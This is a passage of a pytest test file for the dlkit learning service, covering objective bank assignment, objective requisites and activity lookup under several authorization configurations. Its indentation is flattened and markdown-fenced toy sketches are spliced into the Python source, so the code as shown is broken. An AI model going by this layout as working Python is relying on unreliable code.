with pytest.raises(errors.PermissionDenied):
self.session.get_objective_ids_by_objective_banks([self.fake_id])
def test_get_objectives_by_objective_banks(self):
"""Tests get_objectives_by_objective_banks"""
# From test_templates/resource.py::ResourceBinSession::get_resources_by_bins_template
if not is_never_authz(self.service_config):
catalog_ids = [self.catalog.ident, self.assigned_catalog.ident]
results = self.session.get_objectives_by_objective_banks(catalog_ids)
assert isinstance(results, ABCObjects.ObjectiveList)
        # Currently our impl does not remove duplicate objectives
assert results.available() == 5
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_objectives_by_objective_banks([self.fake_id])
def test_get_objective_bank_ids_by_objective(self):
"""Tests get_objective_bank_ids_by_objective"""
# From test_templates/resource.py::ResourceBinSession::get_bin_ids_by_resource_template
if not is_never_authz(self.service_config):
cats = self.svc_mgr.get_objective_bank_ids_by_objective(self.objective_ids[1])
assert cats.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_ids_by_objective(self.fake_id)
def test_get_objective_banks_by_objective(self):
"""Tests get_objective_banks_by_objective"""
# From test_templates/resource.py::ResourceBinSession::get_bins_by_resource_template
if not is_never_authz(self.service_config):
cats = self.svc_mgr.get_objective_banks_by_objective(self.objective_ids[1])
assert cats.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_banks_by_objective(self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_objective_bank_assignment_session_class_fixture(request):
# From test_templates/resource.py::ResourceBinAssignmentSession::init_template
request.cls.service_config = request.param
request.cls.objective_list = list()
request.cls.objective_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveObjectiveBankAssignmentSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank for Assignment'
create_form.description = 'Test ObjectiveBank for ObjectiveObjectiveBankAssignmentSession tests assignment'
request.cls.assigned_catalog = request.cls.svc_mgr.create_objective_bank(create_form)
for num in [0, 1, 2]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveObjectiveBankAssignmentSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.objective_list.append(obj)
request.cls.objective_ids.append(obj.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.assigned_catalog.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_objective_bank_assignment_session_test_fixture(request):
# From test_templates/resource.py::ResourceBinAssignmentSession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("objective_objective_bank_assignment_session_class_fixture", "objective_objective_bank_assignment_session_test_fixture")
class TestObjectiveObjectiveBankAssignmentSession(object):
"""Tests for ObjectiveObjectiveBankAssignmentSession"""
def test_can_assign_objectives(self):
"""Tests can_assign_objectives"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_template
result = self.session.can_assign_objectives()
assert isinstance(result, bool)
def test_can_assign_objectives_to_objective_bank(self):
"""Tests can_assign_objectives_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_to_bin_template
result = self.session.can_assign_objectives_to_objective_bank(self.assigned_catalog.ident)
assert isinstance(result, bool)
def test_get_assignable_objective_bank_ids(self):
"""Tests get_assignable_objective_bank_ids"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_template
    # Note that our implementation just returns all catalogIds, which does not follow
    # the OSID spec (it should return only the catalogIds below the given one in the hierarchy).
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids(self.catalog.ident)
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids(self.fake_id)
def test_get_assignable_objective_bank_ids_for_objective(self):
"""Tests get_assignable_objective_bank_ids_for_objective"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_for_resource_template
    # Note that our implementation just returns all catalogIds, which does not follow
    # the OSID spec (it should return only the catalogIds below the given one in the hierarchy).
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids_for_objective(self.catalog.ident, self.objective_ids[0])
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids_for_objective(self.fake_id, self.fake_id)
def test_assign_objective_to_objective_bank(self):
"""Tests assign_objective_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::assign_resource_to_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_objectives()
assert results.available() == 0
self.session.assign_objective_to_objective_bank(self.objective_ids[1], self.assigned_catalog.ident)
results = self.assigned_catalog.get_objectives()
assert results.available() == 1
self.session.unassign_objective_from_objective_bank(
self.objective_ids[1],
self.assigned_catalog.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.session.assign_objective_to_objective_bank(self.fake_id, self.fake_id)
def test_unassign_objective_from_objective_bank(self):
"""Tests unassign_objective_from_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::unassign_resource_from_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_objectives()
assert results.available() == 0
self.session.assign_objective_to_objective_bank(
self.objective_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_objectives()
assert results.available() == 1
self.session.unassign_objective_from_objective_bank(
self.objective_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_objectives()
assert results.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.session.unassign_objective_from_objective_bank(self.fake_id, self.fake_id)
def test_reassign_proficiency_to_objective_bank(self):
"""Tests reassign_proficiency_to_objective_bank"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.reassign_proficiency_to_objective_bank(True, True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_requisite_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.requisite_list = list()
request.cls.requisite_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveRequisiteSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for ObjectiveRequisiteSession Lookup'
create_form.description = 'Test Objective for ObjectiveRequisiteSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveRequisiteSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.requisite_list.append(obj)
request.cls.requisite_ids.append(obj.ident)
request.cls.catalog.assign_objective_requisite(request.cls.objective.ident, obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_requisite_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj_id in request.cls.requisite_ids:
catalog.delete_objective(obj_id)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_requisite_session_test_fixture(request):
request.cls.session = request.cls.catalog
@pytest.mark.usefixtures("objective_requisite_session_class_fixture", "objective_requisite_session_test_fixture")
class TestObjectiveRequisiteSession(object):
"""Tests for ObjectiveRequisiteSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_lookup_objective_prerequisites(self):
"""Tests can_lookup_objective_prerequisites"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.can_lookup_objective_prerequisites()
def test_use_comparative_objective_view(self):
"""Tests use_comparative_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_comparative_resource_view_template
self.catalog.use_comparative_objective_view()
def test_use_plenary_objective_view(self):
"""Tests use_plenary_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_plenary_resource_view_template
self.catalog.use_plenary_objective_view()
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_requisite_objectives(self):
"""Tests get_requisite_objectives"""
# From test_templates/learning.py::ObjectiveRequsiteSession::get_requisite_objectives_template
if not is_never_authz(self.service_config):
requisites = self.catalog.get_requisite_objectives(self.objective.ident)
assert requisites.available() == len(self.requisite_ids)
for req in requisites:
assert req.ident in self.requisite_ids
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_requisite_objectives(self.fake_id)
def test_get_all_requisite_objectives(self):
"""Tests get_all_requisite_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_all_requisite_objectives(True)
def test_get_dependent_objectives(self):
"""Tests get_dependent_objectives"""
# From test_templates/learning.py::ObjectiveRequsiteSession::get_dependent_objectives_template
if not is_never_authz(self.service_config):
dependents = self.catalog.get_dependent_objectives(self.objective.ident)
assert dependents.available() == 0
dependents = self.catalog.get_dependent_objectives(self.requisite_ids[0])
assert dependents.available() == 1
assert dependents.next().ident == self.objective.ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_dependent_objectives(self.fake_id)
def test_is_objective_required(self):
"""Tests is_objective_required"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.is_objective_required(True, True)
def test_get_equivalent_objectives(self):
"""Tests get_equivalent_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_equivalent_objectives(True)
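# The requisite/dependent lookups exercised above are two views of the same
# relation: get_requisite_objectives walks the edges forward, while
# get_dependent_objectives is the inverse. A minimal in-memory sketch of that
# symmetry (RequisiteMap is a hypothetical stand-in, not a dlkit class):

```python
class RequisiteMap:
    """Toy model of the requisite relation the session tests exercise."""

    def __init__(self):
        self._requisites = {}  # objective id -> set of requisite ids

    def assign(self, objective_id, requisite_id):
        self._requisites.setdefault(objective_id, set()).add(requisite_id)

    def requisites(self, objective_id):
        # Objectives that must be achieved before objective_id.
        return set(self._requisites.get(objective_id, set()))

    def dependents(self, objective_id):
        # Objectives that list objective_id as a requisite (the inverse view).
        return {obj for obj, reqs in self._requisites.items()
                if objective_id in reqs}


m = RequisiteMap()
m.assign('calculus', 'algebra')
m.assign('calculus', 'trigonometry')
```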
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_requisite_assignment_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
@pytest.fixture(scope="function")
def objective_requisite_assignment_session_test_fixture(request):
request.cls.requisite_list = list()
request.cls.requisite_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveRequisiteAssignmentSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for ObjectiveRequisiteAssignmentSession Lookup'
create_form.description = 'Test Objective for ObjectiveRequisiteAssignmentSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveRequisiteAssignmentSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.requisite_list.append(obj)
request.cls.requisite_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_requisite_assignment_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj_id in request.cls.requisite_ids:
catalog.delete_objective(obj_id)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_requisite_assignment_session_class_fixture", "objective_requisite_assignment_session_test_fixture")
class TestObjectiveRequisiteAssignmentSession(object):
"""Tests for ObjectiveRequisiteAssignmentSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_assign_requisites(self):
"""Tests can_assign_requisites"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.can_assign_requisites()
def test_assign_objective_requisite(self):
"""Tests assign_objective_requisite"""
# From test_templates/learning.py::ObjectiveRequsiteAssignmentSession::assign_objective_requisite_template
if not is_never_authz(self.service_config):
results = self.catalog.get_requisite_objectives(self.objective.ident)
assert isinstance(results, ABCObjects.ObjectiveList)
assert results.available() == 0
self.catalog.assign_objective_requisite(self.objective.ident, self.requisite_ids[0])
results = self.catalog.get_requisite_objectives(self.objective.ident)
assert results.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.assign_objective_requisite(self.fake_id, self.fake_id)
def test_unassign_objective_requisite(self):
"""Tests unassign_objective_requisite"""
# From test_templates/learning.py::ObjectiveRequsiteAssignmentSession::unassign_objective_requisite_template
if not is_never_authz(self.service_config):
self.catalog.assign_objective_requisite(self.objective.ident, self.requisite_ids[0])
results = self.catalog.get_requisite_objectives(self.objective.ident)
assert results.available() == 1
self.catalog.unassign_objective_requisite(self.objective.ident, self.requisite_ids[0])
results = self.catalog.get_requisite_objectives(self.objective.ident)
assert results.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.unassign_objective_requisite(self.fake_id, self.fake_id)
def test_assign_equivalent_objective(self):
"""Tests assign_equivalent_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.assign_equivalent_objective(True, True)
def test_unassign_equivalent_objective(self):
"""Tests unassign_equivalent_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.unassign_equivalent_objective(True, True)
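# The assign/unassign tests above check a simple round-trip: assigning a
# requisite makes it visible to get_requisite_objectives, and unassigning it
# removes it again. Sketched with a plain set standing in for the catalog
# (these helper names are illustrative, not dlkit API):

```python
requisites = set()


def assign_objective_requisite(requisite_id):
    requisites.add(requisite_id)


def unassign_objective_requisite(requisite_id):
    # discard (rather than remove) so unassigning twice is harmless
    requisites.discard(requisite_id)


assign_objective_requisite('req-0')
after_assign = len(requisites)
unassign_objective_requisite('req-0')
after_unassign = len(requisites)
```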
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def activity_lookup_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3A000000000000000000000000%40DLKIT.MIT.EDU')
@pytest.fixture(scope="function")
def activity_lookup_session_test_fixture(request):
request.cls.activity_list = list()
request.cls.activity_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ActivityLookupSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for Activity Lookup'
create_form.description = 'Test Objective for ActivityLookupSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1]:
create_form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
create_form.display_name = 'Test Activity ' + str(num)
create_form.description = 'Test Activity for ActivityLookupSession tests'
obj = request.cls.catalog.create_activity(create_form)
request.cls.activity_list.append(obj)
request.cls.activity_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_activity_lookup_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_activities():
catalog.delete_activity(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("activity_lookup_session_class_fixture", "activity_lookup_session_test_fixture")
class TestActivityLookupSession(object):
"""Tests for ActivityLookupSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_lookup_activities(self):
"""Tests can_lookup_activities"""
# From test_templates/resource.py ResourceLookupSession.can_lookup_resources_template
assert isinstance(self.catalog.can_lookup_activities(), bool)
def test_use_comparative_activity_view(self):
"""Tests use_comparative_activity_view"""
# From test_templates/resource.py ResourceLookupSession.use_comparative_resource_view_template
self.catalog.use_comparative_activity_view()
def test_use_plenary_activity_view(self):
"""Tests use_plenary_activity_view"""
# From test_templates/resource.py ResourceLookupSession.use_plenary_resource_view_template
self.catalog.use_plenary_activity_view()
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_activity(self):
"""Tests get_activity"""
# From test_templates/resource.py ResourceLookupSession.get_resource_template
if self.svc_mgr.supports_activity_query():
if not is_never_authz(self.service_config):
self.catalog.use_isolated_objective_bank_view()
obj = self.catalog.get_activity(self.activity_list[0].ident)
assert obj.ident == self.activity_list[0].ident
self.catalog.use_federated_objective_bank_view()
obj = self.catalog.get_activity(self.activity_list[0].ident)
assert obj.ident == self.activity_list[0].ident
else:
with pytest.raises(errors.NotFound):
self.catalog.get_activity(self.fake_id)
else:
if not is_never_authz(self.service_config):
self.catalog.use_isolated_objective_bank_view()
obj = self.catalog.get_activity(self.activity_list[0].ident)
assert obj.ident == self.activity_list[0].ident
self.catalog.use_federated_objective_bank_view()
obj = self.catalog.get_activity(self.activity_list[0].ident)
assert obj.ident == self.activity_list[0].ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activity(self.fake_id)
def test_get_activities_by_ids(self):
"""Tests get_activities_by_ids"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_ids_template
from dlkit.abstract_osid.learning.objects import ActivityList
if self.svc_mgr.supports_activity_query():
objects = self.catalog.get_activities_by_ids(self.activity_ids)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_ids(self.activity_ids)
assert isinstance(objects, ActivityList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities_by_ids(self.activity_ids)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_ids(self.activity_ids)
assert objects.available() > 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activities_by_ids(self.activity_ids)
def test_get_activities_by_genus_type(self):
"""Tests get_activities_by_genus_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_genus_type_template
from dlkit.abstract_osid.learning.objects import ActivityList
if self.svc_mgr.supports_activity_query():
objects = self.catalog.get_activities_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ActivityList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() > 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activities_by_genus_type(DEFAULT_GENUS_TYPE)
def test_get_activities_by_parent_genus_type(self):
"""Tests get_activities_by_parent_genus_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_parent_genus_type_template
from dlkit.abstract_osid.learning.objects import ActivityList
if self.svc_mgr.supports_activity_query():
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() == 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.Unimplemented):
# because the never_authz "tries harder" and runs the actual query...
# whereas above the method itself in JSON returns an empty list
self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() == 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
def test_get_activities_by_record_type(self):
"""Tests get_activities_by_record_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_record_type_template
from dlkit.abstract_osid.learning.objects import ActivityList
if self.svc_mgr.supports_activity_query():
objects = self.catalog.get_activities_by_record_type(DEFAULT_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_record_type(DEFAULT_TYPE)
assert objects.available() == 0
assert isinstance(objects, ActivityList)
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities_by_record_type(DEFAULT_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_record_type(DEFAULT_TYPE)
assert objects.available() == 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activities_by_record_type(DEFAULT_TYPE)
def test_get_activities_for_objective(self):
"""Tests get_activities_for_objective"""
# From test_templates/learning.py::ActivityLookupSession::get_activities_for_objective_template
if self.svc_mgr.supports_activity_query():
results = self.session.get_activities_for_objective(self.objective.ident)
assert isinstance(results, ABCObjects.ActivityList)
if not is_never_authz(self.service_config):
assert results.available() == 2
else:
assert results.available() == 0
else:
if not is_never_authz(self.service_config):
results = self.session.get_activities_for_objective(self.objective.ident)
assert results.available() == 2
assert isinstance(results, ABCObjects.ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_activities_for_objective(self.fake_id)
def test_get_activities_for_objectives(self):
"""Tests get_activities_for_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_activities_for_objectives(True)
def test_get_activities_by_asset(self):
"""Tests get_activities_by_asset"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_activities_by_asset(True)
def test_get_activities_by_assets(self):
"""Tests get_activities_by_assets"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_activities_by_assets(True)
def test_get_activities(self):
"""Tests get_activities"""
# From test_templates/resource.py ResourceLookupSession.get_resources_template
from dlkit.abstract_osid.learning.objects import ActivityList
if self.svc_mgr.supports_activity_query():
objects = self.catalog.get_activities()
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities()
assert isinstance(objects, ActivityList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities()
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities()
assert objects.available() > 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activities()
    def test_get_activity_with_alias(self):
        """Tests get_activity with an aliased Id"""
if not is_never_authz(self.service_config):
# Because you can't create the alias with NEVER_AUTHZ
self.catalog.alias_activity(self.activity_ids[0], ALIAS_ID)
obj = self.catalog.get_activity(ALIAS_ID)
assert obj.get_id() == self.activity_ids[0]
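# test_get_activity_with_alias expects that once an Id is aliased, a lookup by
# the alias resolves to the original object. A minimal sketch of that
# resolution order, alias table first and primary store second (AliasTable is
# a hypothetical stand-in for the dlkit implementation):

```python
class AliasTable:
    def __init__(self):
        self._objects = {}
        self._aliases = {}

    def put(self, obj_id, obj):
        self._objects[obj_id] = obj

    def alias(self, obj_id, alias_id):
        self._aliases[alias_id] = obj_id

    def get(self, some_id):
        # Resolve through the alias table first, falling back to the id itself.
        return self._objects[self._aliases.get(some_id, some_id)]


table = AliasTable()
table.put('activity-1', {'name': 'Test Activity 0'})
table.alias('activity-1', 'alias-1')
```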
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
